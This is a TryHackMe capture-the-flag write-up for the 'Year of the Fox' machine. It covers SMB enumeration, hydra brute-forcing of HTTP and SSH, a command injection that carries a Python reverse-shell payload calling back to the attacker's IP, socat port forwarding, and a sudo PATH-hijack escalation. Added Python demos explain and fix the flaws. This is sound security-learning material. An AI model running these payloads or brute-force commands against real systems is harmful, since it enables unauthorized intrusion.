Year of the Fox on TryHackMe

Before all

A fun and relaxing one, and my second time solving a HARD machine on TryHackMe.

Victim’s IP : 10.10.150.100
Attacker’s IP : 10.9.195.189

Write Up

RECON

port scan

Command:

nmap -sC -sV -Pn 10.10.150.100

Result:
[screenshot]

Well… a web service and a bunch of SMB services. Honestly, I was shocked… (because I'm not familiar with SMB yet).

enum4linux

enum4linux is a tool that enumerates information (users, groups, shares, password policy) from a host's SMB service, typically Samba on a Linux machine.
Command:

enum4linux 10.10.150.100

Result:
There was so much information leaked, but I only used this XD.
[screenshot]
There are two UNIX users, fox and rascal.

Exploitation

http auth brute forcing

The web application on port 80 sits behind HTTP authentication, so I used hydra to brute-force the password with the usernames leaked by enum4linux. hydra's http-get module does HTTP basic auth against the given path (the site root when none is given).
Command:

hydra -l rascal -P /home/kali/rockyou.txt -t 64 10.10.150.100 http-get

Result:
[screenshot]

command injection

After accessing the web application, it looked like this…

[screenshot]

It lets the user search for files, which gave me the idea to try a command injection attack: the search term is most likely dropped into a shell command line, so closing the quoted argument with ", starting my own command after ;, and commenting out the rest of the line with # should give code execution. The payload goes in the JSON body the search form posts.
Payload:

{"target":"\"; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.9.195.189\",1004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")' ;#"}

Of course, I had a listener on port 1004 to receive the shell from the victim.
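To see why the `"; … ;#` shape works, and what the fix looks like, here is an added example that is not code from the box or from the original write-up. The search endpoint's real source is not on the page, so `search_vulnerable`, `search_safe`, the `find`-based search and the sample file tree are all assumptions; the payload body is a harmless `echo INJECTED` instead of a reverse shell.

```python
import re
import subprocess
import tempfile
from pathlib import Path


# Hypothetical reconstruction of the search backend: the user's search term is
# pasted into a command line that /bin/sh then re-parses.
def search_vulnerable(base: str, target: str) -> str:
    cmd = f'find "{base}" -name "*{target}*"'
    # shell=True hands the whole string to sh -c: a `"` in target closes the
    # quoted pattern, `;` ends the find command, `#` comments out the tail.
    res = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return res.stdout


# Hardened version: argv list (no shell re-parsing at all) plus an allowlist so
# quotes, spaces and glob characters never get near the command.
SAFE_TERM = re.compile(r"[\w.-]{1,64}")


def search_safe(base: str, target: str) -> str:
    if not SAFE_TERM.fullmatch(target):
        raise ValueError("invalid search term")
    res = subprocess.run(["find", base, "-name", f"*{target}*"],
                         capture_output=True, text=True)
    return res.stdout


# Same shape as the write-up's payload with a harmless body: close the quote,
# run our own command, comment out whatever the application appends.
PAYLOAD = '"; echo INJECTED ;#'


def demo() -> tuple:
    """Run both handlers against a constructed file tree.
    Returns (vulnerable_output, safe_rejected_payload, safe_legit_output)."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "notes.txt").write_text("sample\n")  # constructed sample file
        vuln_out = search_vulnerable(d, PAYLOAD)
        try:
            search_safe(d, PAYLOAD)
            rejected = False
        except ValueError:
            rejected = True
        legit = search_safe(d, "notes")
    return vuln_out, rejected, legit


if __name__ == "__main__":
    out, rejected, legit = demo()
    print("vulnerable handler output:\n" + out)        # last line: INJECTED
    print("safe handler rejected payload:", rejected)  # True
    print("safe handler, legit term:\n" + legit)       # .../notes.txt
```

The same break-out works with `$(...)` or backticks inside the double quotes, so filtering `;` alone is not a fix. Whatever the backend language, the fix is the same as above: never hand user input to a shell, and if a shell is unavoidable, quote the value with the language's `shlex.quote`/`escapeshellarg` equivalent and validate it against an allowlist first.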

ssh brute forcing

Command:

ss -tulnp

Result:

[screenshot]

Well… there's an SSH service listening on the internal interface only (127.0.0.1), so it would be easier to brute-force the user's password from the outside if I could reach it.

So I wanted to download socat onto the victim from my computer, so I could open another port on the victim that passes through to the internal SSH service, well…

[screenshot]
Permission denied!
So I searched for a folder with write permission (it also has to be on a filesystem mounted without noexec, or chmod +x won't help)…
Command:

cd /
ls -al

[screenshot]
The tmp folder can be used!
P.S. Don't forget to make it executable~

chmod +x socat

Now it's time to expose the SSH service to the outside with socat!
Command:

./socat tcp-listen:5427,reuseaddr,fork tcp:localhost:22

Finally, here comes the brute forcing~
Command:

hydra -l fox -P /home/kali/rockyou.txt -t 64 ssh://10.10.150.100 -s 5427

Result:
[screenshot]

(hydra warns that many SSH configurations limit the number of parallel tasks and recommends -t 4; if the run stalls against the forwarded port, lower -t.)

Now log in with the credentials~

[screenshot]

Privilege Escalation

poweroff escalation

First of all, check my sudo permissions with sudo -l:

[screenshot]

I set up an HTTP server on the victim to pull the binary down and find out how /usr/sbin/shutdown works…
Reverse engineering with Ghidra:
[screenshot]
…
Well, well, well…
After that, I searched for the poweroff command on GTFOBins
[screenshot]
Nothing found.
WHAT?!!
And finally, I found this:
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-shutdown-poweroff-privilege-escalation/
Command:

echo /bin/bash > /tmp/poweroff
chmod +x /tmp/poweroff
export PATH=/tmp:$PATH
sudo /usr/sbin/shutdown
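Why this works: the technique on the exploit-notes page relies on shutdown invoking `poweroff` by bare name, so whichever directory comes first in PATH decides which `poweroff` runs, and here sudo passed the caller's PATH through unchanged. The check to make before trying it is in the `sudo -l` output itself: a `Defaults secure_path=...` line under "Matching Defaults entries" means sudo replaces PATH before exec, and the hijack never reaches the program. The following is an added example, not from the write-up or from exploit-notes: `my_shutdown` is a hypothetical stand-in for the box's /usr/sbin/shutdown, the fake `poweroff` writes a marker file instead of spawning bash, and an empty directory stands in for the system bin directories so the real poweroff is never executed.

```python
import stat
import subprocess
import tempfile
from pathlib import Path


def _write_exec(path: Path, body: str) -> None:
    """Create a small executable script."""
    path.write_text(body)
    path.chmod(path.stat().st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)


def run_wrapper(hijack: bool, secure_path: bool) -> str:
    """Run a stand-in for /usr/sbin/shutdown and report which poweroff it hit.

    hijack:      put a fake poweroff first in the caller's PATH (the trick above)
    secure_path: emulate sudo's Defaults secure_path, which discards the caller's
                 PATH and installs a fixed one before exec
    """
    with tempfile.TemporaryDirectory() as d:
        tmp = Path(d)
        marker = tmp / "marker"
        # hypothetical privileged wrapper: calls poweroff without an absolute path
        _write_exec(tmp / "my_shutdown", "#!/bin/sh\npoweroff\n")
        # attacker-controlled dir, like /tmp in the write-up, holding a fake poweroff
        hijack_dir = tmp / "hijack"
        hijack_dir.mkdir()
        _write_exec(hijack_dir / "poweroff", f"#!/bin/sh\necho owned > '{marker}'\n")
        # empty dir in place of /usr/sbin:/usr/bin so the real poweroff never runs
        sysbin = tmp / "sysbin"
        sysbin.mkdir()
        caller_path = f"{hijack_dir}:{sysbin}" if hijack else str(sysbin)
        env = {"PATH": str(sysbin) if secure_path else caller_path}
        subprocess.run([str(tmp / "my_shutdown")], env=env,
                       capture_output=True, check=False)
        return "hijacked" if marker.exists() else "not hijacked"


if __name__ == "__main__":
    print("PATH hijack, no secure_path :", run_wrapper(hijack=True, secure_path=False))
    print("PATH hijack, secure_path set:", run_wrapper(hijack=True, secure_path=True))
    print("no hijack                   :", run_wrapper(hijack=False, secure_path=False))
```

The developer-side fix is the mirror image: a program that runs with elevated rights must call helpers by absolute path (or reset PATH itself) and the sudoers entry should keep `secure_path` and `env_reset` in place.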

And finally… root!!!
But what?
[screenshot]
Kinda tricky(
Just a simple game of hide-and-seek though…

find / | grep root

[screenshot]
Aha!
[screenshot]
So…
who can tell me the meaning of:

YTAyNzQ3ODZlMmE2MjcwNzg2NjZkNjQ2Nzc5NzA0NjY2Njc2NjY4M2I2OTMyMzIzNTNhNjk2ODMw
Mwo=

:>
🦈🐋🦈🐋

After all

Now stuck on Year of the Dog :<